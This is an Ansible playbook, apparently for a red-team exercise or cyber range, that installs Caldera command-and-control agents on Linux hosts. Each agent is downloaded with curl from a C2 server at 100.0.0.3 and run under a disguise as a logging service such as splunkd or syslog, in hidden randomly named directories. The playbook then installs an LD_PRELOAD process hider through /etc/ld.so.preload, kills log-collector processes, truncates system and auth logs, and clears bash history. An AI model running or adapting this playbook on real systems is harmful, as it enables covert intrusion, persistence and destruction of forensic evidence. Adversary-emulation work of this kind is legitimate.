---
- name: Deploy Caldera agents and process hider on Linux hosts
  hosts: linux
  become: yes
  gather_facts: yes

  vars:
    deploy_base_dir: "/tmp/.syslogd_backup"
    purge_logs: true

  tasks:
    ###################################################################
    # Generate stable random folder names ONCE
    ###################################################################
    - name: Generate consistent random folder names
      set_fact:
        random_folder1: "{{ lookup('password', '/dev/null', length=4, chars='ascii_letters') }}"
        random_folder2: "{{ lookup('password', '/dev/null', length=4, chars='ascii_letters') }}"
        random_folder3: "{{ lookup('password', '/dev/null', length=4, chars='ascii_letters') }}"

    - name: Set final hidden deploy path
      set_fact:
        deploy_dir: "{{ deploy_base_dir }}/{{ random_folder1 }}/{{ random_folder2 }}/{{ random_folder3 }}"

    ###################################################################
    # Environment setup
    ###################################################################
    - name: setup
      package:
        name:
          - update
          - python3
          - python3-pip
          - make
        state: present

    - name: Create base hidden deployment directory
      file:
        path: "{{ deploy_base_dir }}"
        state: directory
        mode: "0755"

    - name: Create nested hidden deployment directory
      file:
        path: "{{ deploy_dir }}"
        state: directory
        mode: "0755"

    ###################################################################
    # Clean up existing agents if any (optional pre-clean)
    ###################################################################
    - name: Clean up any existing agents in /tmp or previous runs
      shell: |
        pkill -f splunk || true
        pkill -f syslog || true
        pkill -f graylog || true
        pkill -f notlog || true
        pkill -f ragdoll || true
        rm -f /tmp/splunk* /tmp/syslog* /tmp/graylog* /tmp/notlog* /tmp/ragdoll* || true
      ignore_errors: yes

    - name: Clean up previous kernel link
      shell: "echo "" > /etc/ld.so.preload"
      ignore_errors: yes

    - name: Delete previous created process.so
      file:
        path: /usr/local/lib/process.so
        state: absent

    ###################################################################
    # Deploy agents
    ###################################################################

    # --- HTTP AGENTS (Sandcat) ---
    - name: Deploy HTTP agents
      shell: |
        server="http://100.0.0.3:8888"
        cd {{ deploy_dir }}
        for name in splunkd splunk syslog; do
          curl -s -X POST -H "file:sandcat.go" -H "platform:linux" "$server/file/download" > "$name"
          chmod +x "$name"
          nohup ./"$name" -server "$server" -group red >/dev/null 2>&1 &
        done

    # --- HTML AGENTS (RagDoll) ---
    - name: Deploy HTML agents
      shell: |
        server="http://100.0.0.3:8888"
        cd {{ deploy_dir }}
        pip install -q requests beautifulsoup4
        for name in notlog-html syslog-html; do
          curl -s -X POST -H "file:ragdoll.py" -H "platform:linux" "$server/file/download" > "$name.py"
          nohup python3 "$name.py" -W "$server/weather" >/dev/null 2>&1 &
        done

    # --- TCP AGENTS (Manx) ---
    - name: Deploy TCP agents
      shell: |
        server="http://100.0.0.3:8888"
        socket="100.0.0.3:7010"
        contact="tcp"
        cd {{ deploy_dir }}
        for name in notlog-tcp syslog-tcp splunk-tcp; do
          curl -s -X POST -H "file:manx.go" -H "platform:linux" "$server/file/download" > "$name"
          chmod +x "$name"
          nohup ./"$name" -http "$server" -socket "$socket" -contact "$contact" >/dev/null 2>&1 &
        done

    ###################################################################
    # Build and install process hider
    ###################################################################
    - name: Copy processhider.c from hideprocesses folder
      copy:
        src: ../hideprocesses/processhider.c
        dest: "{{ deploy_dir }}/processhider.c"
        mode: "0644"

    - name: Copy Makefile from hideprocesses folder
      copy:
        src: ../hideprocesses/Makefile
        dest: "{{ deploy_dir }}/Makefile"
        mode: "0644"

    - name: Build process hider via make
      command: make
      args:
        chdir: "{{ deploy_dir }}"
      ignore_errors: yes

    - name: Move compiled .so and update /etc/ld.so.preload
      shell: |
        mv {{ deploy_dir }}/process.so /usr/local/lib/ 
    
    - name: echo to preload
      shell: "echo "/usr/local/lib/process.so" >> /etc/ld.so.preload"

    ###################################################################
    # Clean up only source files, not the deployed agents
    ###################################################################
    - name: Remove processhider source files
      file:
        path: "{{ item }}"
        state: absent
      loop:
        - "{{ deploy_dir }}/processhider.c"
        - "{{ deploy_dir }}/Makefile"

    ###################################################################
    # Log and history cleanup
    ###################################################################
    - block:
        - name: Truncate syslog (Debian/Ubuntu)
          shell: "truncate -s 0 /var/log/syslog 2>/dev/null || true"
          when: ansible_facts['os_family'] == "Debian"

        - name: Truncate auth.log (Debian/Ubuntu)
          shell: "truncate -s 0 /var/log/auth.log 2>/dev/null || true"
          when: ansible_facts['os_family'] == "Debian"

        - name: Truncate messages (Rocky/RedHat)
          shell: "truncate -s 0 /var/log/messages 2>/dev/null || true"
          when: ansible_facts['os_family'] == "RedHat"

        - name: Truncate secure (Rocky/RedHat)
          shell: "truncate -s 0 /var/log/secure 2>/dev/null || true"
          when: ansible_facts['os_family'] == "RedHat"

        - name: Clear root bash history
          shell: |
            [ -f /root/.bash_history ] && cat /dev/null > /root/.bash_history 2>/dev/null || true
            history -c 2>/dev/null || true
            history -w 2>/dev/null || true

        - name: Clear primary user's bash history (john_hammond)
          shell: |
            [ -f /home/john_hammond/.bash_history ] && cat /dev/null > /home/john_hammond/.bash_history 2>/dev/null || true
      when: purge_logs
